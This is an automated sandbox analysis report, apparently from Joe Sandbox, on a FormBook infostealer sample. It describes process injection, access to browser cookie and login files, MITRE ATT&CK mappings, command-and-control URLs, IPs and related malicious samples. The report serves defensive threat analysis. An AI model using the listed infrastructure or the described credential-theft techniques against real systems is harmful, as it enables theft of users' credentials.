                Source: Yara match | File source: 00000001.00000002.1864625418.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\mobsync.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: YH-3-12-2024-GDL Units - Projects.exe | Binary or memory string: WIN_81
                Source: YH-3-12-2024-GDL Units - Projects.exe | Binary or memory string: WIN_XP
                Source: YH-3-12-2024-GDL Units - Projects.exe | Binary or memory string: WIN_XPe
                Source: YH-3-12-2024-GDL Units - Projects.exe | Binary or memory string: WIN_VISTA
                Source: YH-3-12-2024-GDL Units - Projects.exe | Binary or memory string: WIN_7
                Source: YH-3-12-2024-GDL Units - Projects.exe | Binary or memory string: WIN_8
                Source: YH-3-12-2024-GDL Units - Projects.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000001.00000002.1863712666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1867432570.0000000007C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.3503391592.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.3503361317.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.3502685707.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.3502512945.0000000002E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.3504903691.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1864625418.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe, Code function: 0_2_00836283 socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe, Code function: 0_2_00836747 socket, WSAGetLastError, bind, WSAGetLastError, closesocket
MITRE ATT&CK Matrix (matched techniques per tactic, with the number of matching signatures in parentheses)

Reconnaissance: none
Resource Development: none
Initial Access: Valid Accounts (2)
Execution: Native API (2)
Persistence: DLL Side-Loading (1), Valid Accounts (2)
Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (412)
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (3), DLL Side-Loading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (2), Access Token Manipulation (21), Process Injection (412)
Credential Access: OS Credential Dumping (1), Input Capture (21)
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (116), Security Software Discovery (261), Virtualization/Sandbox Evasion (2), Process Discovery (3), Application Window Discovery (1), System Owner/User Discovery (1)
Lateral Movement: none
Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3)
Command and Control: Ingress Tool Transfer (5), Encrypted Channel (1), Non-Application Layer Protocol (5), Application Layer Protocol (5)
Exfiltration: none
Impact: System Shutdown/Reboot (1)
Behavior Graph

Behavior Graph ID: 1567130
Sample: YH-3-12-2024-GDL Units - Pr...
Start date: 03/12/2024
Architecture: WINDOWS
Score: 100

Network nodes: www.logidant.xyz, www.tals.xyz and 11 other IPs or domains. Signatures on the network nodes: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; 6 other signatures. www.tals.xyz: Performs DNS queries to domains with low reputation.

Process chain:

• YH-3-12-2024-GDL Units - Projects.exe (started): Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Maps a DLL or memory area into another process
  • svchost.exe (started by the sample): Maps a DLL or memory area into another process
    • zZyhwwvEVl.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
      • mobsync.exe (started by zZyhwwvEVl.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        • zZyhwwvEVl.exe (injected by mobsync.exe): Found direct / indirect Syscall (likely to bypass EDR); network traffic to logidant.xyz 45.141.156.114 (ports 49878, 49885, 49892; YURTEH-ASUA, Germany), aballanet.cat 134.0.14.158 (ports 49737, 49738, 49739; CDMONsistemescdmoncomES, Spain) and 8 other IPs or domains
        • firefox.exe (started by mobsync.exe)

Source | Detection | Scanner | Label
YH-3-12-2024-GDL Units - Projects.exe | 32% | ReversingLabs | Win32.Trojan.AutoitInject
YH-3-12-2024-GDL Units - Projects.exe | 33% | Virustotal |
YH-3-12-2024-GDL Units - Projects.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
logidant.xyz | 11% | Virustotal |
www.yunlekeji.top | 1% | Virustotal |
aballanet.cat | 0% | Virustotal |
Source | Detection | Scanner | Label
http://www.aballanet.cat/6xrr/?rfJh=HxJAUmNG5a+243k4mB40tOImfLHqxfdDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQeeC+l9WsNh28r7y2sDNsg9aoK9FWK5iLU0=&O258-=pHdHBdXhwLO | 100% | Avira URL Cloud | malware
http://www.zkdamdjj.shop/kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXIiiXeZyn2c+rOjHayKJI+/jeoNtslqItL4=&O258-=pHdHBdXhwLO | 0% | Avira URL Cloud | safe
http://www.yunlekeji.top/t322/?rfJh=FCfXCbowRdQKA3bJwmXvc8lOOpkaFxffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR69fnaXkcIGP7N+ZF5LcImJ8BAL5CR7GLvE=&O258-=pHdHBdXhwLO | 0% | Avira URL Cloud | safe
http://www.logidant.xyz/iuvu/ | 0% | Avira URL Cloud | safe
http://www.tals.xyz/k1td/?rfJh=oEMxw+ab8QlEZmTlDbCKptskN0q9+wMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTBaIFjRaD0WqdXDHZ0BQI5kG8sOnP1u2RJI=&O258-=pHdHBdXhwLO | 0% | Avira URL Cloud | safe
http://www.zkdamdjj.shop/kf1m/ | 0% | Avira URL Cloud | safe
http://www.tals.xyz/k1td/ | 0% | Avira URL Cloud | safe
http://www.canadavinreport.site/g3h7/ | 0% | Avira URL Cloud | safe
http://www.brightvision.website | 0% | Avira URL Cloud | safe
http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLO | 0% | Avira URL Cloud | safe
http://www.laohub10.net/36be/ | 0% | Avira URL Cloud | safe
http://www.thinkphp.cn | 0% | Avira URL Cloud | safe
http://www.aballanet.cat/6xrr/ | 100% | Avira URL Cloud | malware
http://aballanet.cat/6xrr/?rfJh=HxJAUmNG5a | 100% | Avira URL Cloud | malware
http://www.brightvision.website/gn26/?rfJh=fgpTVhEuh+HnR3p3mfMFhWHWnuNeMM4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9KgaN0dmEc5ka6rkf4Wz0wYWqHeygGDkXS8=&O258-=pHdHBdXhwLO | 0% | Avira URL Cloud | safe
http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5 | 0% | Avira URL Cloud | safe
http://www.izmirescortg.xyz/lnl7/?rfJh=kAPJ1zL1a1XedmcoetGOcXX+BQ0sya6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZSqhyZMy+6OBPTB2cT6zQPdPsX8z060ybXY=&O258-=pHdHBdXhwLO | 0% | Avira URL Cloud | safe
http://www.laohub10.net/36be/?O258-=pHdHBdXhwLO&rfJh=zT+fCPSXWqCfWPgPkoP8augIhoSODsGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rERMucz0ZFCszNnC27qzdt1he7kDJbjieX8= | 0% | Avira URL Cloud | safe
http://www.canadavinreport.site/g3h7/?rfJh=dyqW | 0% | Avira URL Cloud | safe
http://www.brightvision.website/gn26/ | 0% | Avira URL Cloud | safe
http://www.logidant.xyz/iuvu/?rfJh=4GSi4NjhieA+eby3OKR9UHmAChFha0TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yneyjQ3W+H8Nz5kvkADuxuBf3arJIsYCs9inQ=&O258-=pHdHBdXhwLO | 0% | Avira URL Cloud | safe
http://www.canadavinreport.site/g3h7/?rfJh=dyqW+SkpLS8uL5dSny8q8PjeDBZe49z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRpkPLcScFLLxAHuiMJY3F0pG7ioCFxuNP/M=&O258-=pHdHBdXhwLO | 0% | Avira URL Cloud | safe
http://www.madhf.tech/0mwe/ | 0% | Avira URL Cloud | safe
http://www.yunlekeji.top/t322/ | 0% | Avira URL Cloud | safe
https://zkdamdjj.shop/kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Reputation
www.izmirescortg.xyz | 104.21.36.62 | true | false | high
www.brightvision.website | 203.161.42.73 | true | false | unknown
www.madhf.tech | 103.224.182.242 | true | false | high
r0lqcud7.nbnnn.xyz | 23.225.159.42 | true | false | high
logidant.xyz | 45.141.156.114 | true | true | unknown
www.yunlekeji.top | 106.15.109.33 | true | false | unknown
www.tals.xyz | 13.248.169.48 | true | false | high
www.zkdamdjj.shop | 172.67.187.114 | true | false | high
www.canadavinreport.site | 185.27.134.206 | true | false | high
aballanet.cat | 134.0.14.158 | true | true | unknown
www.logidant.xyz | unknown | unknown | true | unknown
www.laohub10.net | unknown | unknown | false | high
www.aballanet.cat | unknown | unknown | false | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.aballanet.cat/6xrr/?rfJh=HxJAUmNG5a+243k4mB40tOImfLHqxfdDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQeeC+l9WsNh28r7y2sDNsg9aoK9FWK5iLU0=&O258-=pHdHBdXhwLO | true | Avira URL Cloud: malware | unknown
http://www.canadavinreport.site/g3h7/ | false | Avira URL Cloud: safe | unknown
http://www.yunlekeji.top/t322/?rfJh=FCfXCbowRdQKA3bJwmXvc8lOOpkaFxffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR69fnaXkcIGP7N+ZF5LcImJ8BAL5CR7GLvE=&O258-=pHdHBdXhwLO | false | Avira URL Cloud: safe | unknown
http://www.zkdamdjj.shop/kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXIiiXeZyn2c+rOjHayKJI+/jeoNtslqItL4=&O258-=pHdHBdXhwLO | false | Avira URL Cloud: safe | unknown
http://www.tals.xyz/k1td/ | false | Avira URL Cloud: safe | unknown
http://www.logidant.xyz/iuvu/ | true | Avira URL Cloud: safe | unknown
http://www.zkdamdjj.shop/kf1m/ | false | Avira URL Cloud: safe | unknown
http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLO | false | Avira URL Cloud: safe | unknown
http://www.tals.xyz/k1td/?rfJh=oEMxw+ab8QlEZmTlDbCKptskN0q9+wMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTBaIFjRaD0WqdXDHZ0BQI5kG8sOnP1u2RJI=&O258-=pHdHBdXhwLO | false | Avira URL Cloud: safe | unknown
http://www.aballanet.cat/6xrr/ | true | Avira URL Cloud: malware | unknown
http://www.laohub10.net/36be/ | false | Avira URL Cloud: safe | unknown
http://www.izmirescortg.xyz/lnl7/?rfJh=kAPJ1zL1a1XedmcoetGOcXX+BQ0sya6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZSqhyZMy+6OBPTB2cT6zQPdPsX8z060ybXY=&O258-=pHdHBdXhwLO | false | Avira URL Cloud: safe | unknown
http://www.brightvision.website/gn26/?rfJh=fgpTVhEuh+HnR3p3mfMFhWHWnuNeMM4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9KgaN0dmEc5ka6rkf4Wz0wYWqHeygGDkXS8=&O258-=pHdHBdXhwLO | false | Avira URL Cloud: safe | unknown
http://www.laohub10.net/36be/?O258-=pHdHBdXhwLO&rfJh=zT+fCPSXWqCfWPgPkoP8augIhoSODsGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rERMucz0ZFCszNnC27qzdt1he7kDJbjieX8= | false | Avira URL Cloud: safe | unknown
http://www.brightvision.website/gn26/ | false | Avira URL Cloud: safe | unknown
http://www.logidant.xyz/iuvu/?rfJh=4GSi4NjhieA+eby3OKR9UHmAChFha0TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yneyjQ3W+H8Nz5kvkADuxuBf3arJIsYCs9inQ=&O258-=pHdHBdXhwLO | true | Avira URL Cloud: safe | unknown
http://www.canadavinreport.site/g3h7/?rfJh=dyqW+SkpLS8uL5dSny8q8PjeDBZe49z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRpkPLcScFLLxAHuiMJY3F0pG7ioCFxuNP/M=&O258-=pHdHBdXhwLO | false | Avira URL Cloud: safe | unknown
http://www.madhf.tech/0mwe/ | false | Avira URL Cloud: safe | unknown
http://www.yunlekeji.top/t322/ | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.brightvision.website | zZyhwwvEVl.exe, 00000007.00000002.3504903691.0000000005911000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.thinkphp.cn | mobsync.exe, 00000003.00000002.3503963835.0000000005E3C000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000003E9C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.canadavinreport.site/g3h7/?rfJh=dyqW | mobsync.exe, 00000003.00000002.3505219170.0000000007B30000.00000004.00000800.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://aballanet.cat/6xrr/?rfJh=HxJAUmNG5a | mobsync.exe, 00000003.00000002.3503963835.0000000005986000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.00000000039E6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5 | zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000003B78000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://zkdamdjj.shop/kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3 | mobsync.exe, 00000003.00000002.3503963835.00000000062F2000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000004352000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
45.141.156.114 | logidant.xyz | Germany | 30860 | YURTEH-ASUA | true
106.15.109.33 | www.yunlekeji.top | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | false
172.67.187.114 | www.zkdamdjj.shop | United States | 13335 | CLOUDFLARENETUS | false
13.248.169.48 | www.tals.xyz | United States | 16509 | AMAZON-02US | false
203.161.42.73 | www.brightvision.website | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | false
23.225.159.42 | r0lqcud7.nbnnn.xyz | United States | 40065 | CNSERVERSUS | false
103.224.182.242 | www.madhf.tech | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | false
185.27.134.206 | www.canadavinreport.site | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | false
104.21.36.62 | www.izmirescortg.xyz | United States | 13335 | CLOUDFLARENETUS | false
134.0.14.158 | aballanet.cat | Spain | 197712 | CDMONsistemescdmoncomES | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567130
Start date and time: 2024-12-03 06:52:43 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: YH-3-12-2024-GDL Units - Projects.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@12/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 49
• Number of non-executed functions: 279
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target zZyhwwvEVl.exe, PID 2924 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
45.141.156.114 | BASF Hung#U00e1ria Kft.exe | Get hash | malicious | FormBook | Browse
  • www.logidant.xyz/iuvu/
| CV_ Filipa Barbosa.exe | Get hash | malicious | FormBook | Browse
  • www.logidant.xyz/ctvu/
| CV_ Filipa Barbosa.exe | Get hash | malicious | FormBook | Browse
  • www.logidant.xyz/ctvu/
| Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Get hash | malicious | FormBook | Browse
  • www.logidant.xyz/iuvu/
| CV_ Filipa Barbosa.exe | Get hash | malicious | FormBook | Browse
  • www.logidant.xyz/ctvu/
106.15.109.33 | BASF Hung#U00e1ria Kft.exe | Get hash | malicious | FormBook | Browse
  • www.yunlekeji.top/t322/
| Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Get hash | malicious | FormBook | Browse
  • www.yunlekeji.top/t322/
172.67.187.114 | Proforma invoice - Arancia NZ.exe | Get hash | malicious | FormBook | Browse
  • www.zkdamdjj.shop/swhs/
| TNT Express Delivery Consignment AWD 87993766479.vbs | Get hash | malicious | FormBook | Browse
  • www.zkdamdjj.shop/z3j2/
13.248.169.48 | Proforma invoice - Arancia NZ.exe | Get hash | malicious | FormBook | Browse
  • www.optimismbank.xyz/98j3/
| lKvXJ7VVCK.exe | Get hash | malicious | FormBook | Browse
  • www.avalanchefi.xyz/ctta/
| BASF Hung#U00e1ria Kft.exe | Get hash | malicious | FormBook | Browse
  • www.tals.xyz/k1td/
| PAYMENT_ADVICE.exe | Get hash | malicious | FormBook | Browse
  • www.heliopsis.xyz/69zn/
| 1k24tbb-00241346.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • www.gupiao.bet/t3a1/
| Documents.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • www.hasan.cloud/tur7/
| CV_ Filipa Barbosa.exe | Get hash | malicious | FormBook | Browse
  • www.egyshare.xyz/lp5b/
| attached order.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • www.aktmarket.xyz/wb7v/
| file.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • www.gupiao.bet/t3a1/
| DO-COSU6387686280.pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • www.krshop.shop/grhe/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.madhf.tech | Proforma invoice - Arancia NZ.exe | Get hash | malicious | FormBook | Browse
  • 103.224.182.242
| Quotation Validity.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • 103.224.182.242
| BASF Hung#U00e1ria Kft.exe | Get hash | malicious | FormBook | Browse
  • 15.204.67.7
| Purchase Order PO.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • 103.224.182.242
| Payment_Confirmation_pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • 103.224.182.242
| PAYROLL LIST.exe | Get hash | malicious | FormBook | Browse
  • 103.224.182.242
| Purchase Order PO.exe | Get hash | malicious | FormBook | Browse
  • 103.224.182.242
| Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Get hash | malicious | FormBook | Browse
  • 103.224.182.242
| SWIFT COPY 0028_pdf.exe | Get hash | malicious | FormBook | Browse
  • 103.224.182.242
| Item-RQF-9456786.exe | Get hash | malicious | Unknown | Browse
  • 103.224.182.242
www.izmirescortg.xyz | Order MEI PO IM202411484.exe | Get hash | malicious | FormBook | Browse
  • 172.67.186.192
| BASF Hung#U00e1ria Kft.exe | Get hash | malicious | FormBook | Browse
  • 172.67.186.192
| IETC-24017.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • 172.67.186.192
| file.exe | Get hash | malicious | FormBook | Browse
  • 172.67.186.192
| Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Get hash | malicious | FormBook | Browse
  • 104.21.36.62
www.brightvision.website | BASF Hung#U00e1ria Kft.exe | Get hash | malicious | FormBook | Browse
  • 203.161.42.73
| Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Get hash | malicious | FormBook | Browse
  • 203.161.42.73
r0lqcud7.nbnnn.xyz | Proforma invoice - Arancia NZ.exe | Get hash | malicious | FormBook | Browse
  • 202.79.161.151
| lKvXJ7VVCK.exe | Get hash | malicious | FormBook | Browse
  • 23.225.159.42
| BASF Hung#U00e1ria Kft.exe | Get hash | malicious | FormBook | Browse
  • 27.124.4.246
| specifications.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • 23.225.159.42
| OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse
  • 202.79.161.151
| ARRIVAL NOTICE.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • 202.79.161.151
| OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse
  • 27.124.4.246
| REQUESTING FOR UPDATED SOA.exe | Get hash | malicious | FormBook | Browse
  • 23.225.160.132
| PAYROLL LIST.exe | Get hash | malicious | FormBook | Browse
  • 23.225.160.132
| purchase Order.exe | Get hash | malicious | FormBook | Browse
  • 27.124.4.246
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | file.exe | Get hash | malicious | Unknown | Browse
  • 120.26.3.80
| sora.sh4.elf | Get hash | malicious | Mirai | Browse
  • 47.109.175.2
| la.bot.mips.elf | Get hash | malicious | Mirai | Browse
  • 47.101.239.46
| la.bot.sh4.elf | Get hash | malicious | Mirai | Browse
  • 106.14.214.167
| la.bot.powerpc.elf | Get hash | malicious | Mirai | Browse
  • 8.174.223.244
| arm.nn-20241201-1515.elf | Get hash | malicious | Mirai, Okiru | Browse
  • 115.28.220.3
| x86_32.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
  • 8.184.85.27
| sh4.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
  • 139.249.66.217
| arm.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
  • 139.196.225.32
| sora.m68k.elf | Get hash | malicious | Mirai | Browse
  • 8.186.203.103
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC Stealer | Browse
  • 104.21.16.9
| file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | Browse
  • 172.67.165.166
| file.exe | Get hash | malicious | LummaC Stealer | Browse
  • 172.67.165.166
| P#U0142atno#U015b#U0107 8557899,jpg.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse
  • 172.67.177.134
| file.exe | Get hash | malicious | LummaC Stealer | Browse
  • 104.21.16.9
